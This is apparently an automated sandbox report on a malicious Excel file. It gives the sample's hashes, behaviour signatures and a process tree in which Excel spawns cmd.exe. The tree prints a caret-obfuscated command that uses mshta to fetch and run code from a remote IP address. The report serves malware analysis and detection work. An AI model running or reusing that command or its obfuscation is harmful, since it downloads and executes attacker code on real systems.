Analysis
-
max time kernel
17s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 21:43
Behavioral task
behavioral1
Sample
c9e12c49d8ffdd74eb48df9d9acefad2ba0e0b3e93ef4bdce5d1bd69899ca6eb.xls
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c9e12c49d8ffdd74eb48df9d9acefad2ba0e0b3e93ef4bdce5d1bd69899ca6eb.xls
Resource
win10v2004-20241007-en
General
-
Target
c9e12c49d8ffdd74eb48df9d9acefad2ba0e0b3e93ef4bdce5d1bd69899ca6eb.xls
-
Size
46KB
-
MD5
40f0ef3ef45b688195f83abc45c69d14
-
SHA1
5c4632726a8e979f7eedc0f5cd0b739d44004696
-
SHA256
c9e12c49d8ffdd74eb48df9d9acefad2ba0e0b3e93ef4bdce5d1bd69899ca6eb
-
SHA512
4dffc5fab50f86cf91fd8a576c49687b999d19bea1f27fb807c4ab91ec73f213a1e41c74fac31342e63d578fc2c75232dc99fd8bf5897554424d67978b4e7715
-
SSDEEP
768:gxFpGk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJDvzwZhGjk9DnNZQJoD88yIvuEHn:OrGk3hbdlylKsgqopeJBWhZFGkE+cL2d
Malware Config
Extracted
http://87.251.86.178/pp/bb.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2928 564 cmd.exe 29 -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 4 2816 mshta.exe 5 2816 mshta.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EXCEL.EXEcmd.exemshta.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 564 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid Process 564 EXCEL.EXE 564 EXCEL.EXE 564 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid Process procid_target PID 564 wrote to memory of 2928 564 EXCEL.EXE 30 PID 564 wrote to memory of 2928 564 EXCEL.EXE 30 PID 564 wrote to memory of 2928 564 EXCEL.EXE 30 PID 564 wrote to memory of 2928 564 EXCEL.EXE 30 PID 2928 wrote to memory of 2816 2928 cmd.exe 32 PID 2928 wrote to memory of 2816 2928 cmd.exe 32 PID 2928 wrote to memory of 2816 2928 cmd.exe 32 PID 2928 wrote to memory of 2816 2928 cmd.exe 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c9e12c49d8ffdd74eb48df9d9acefad2ba0e0b3e93ef4bdce5d1bd69899ca6eb.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\cmd.execmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/bb.html2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\mshta.exemshta http://87.251.86.178/pp/bb.html3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2816
-
-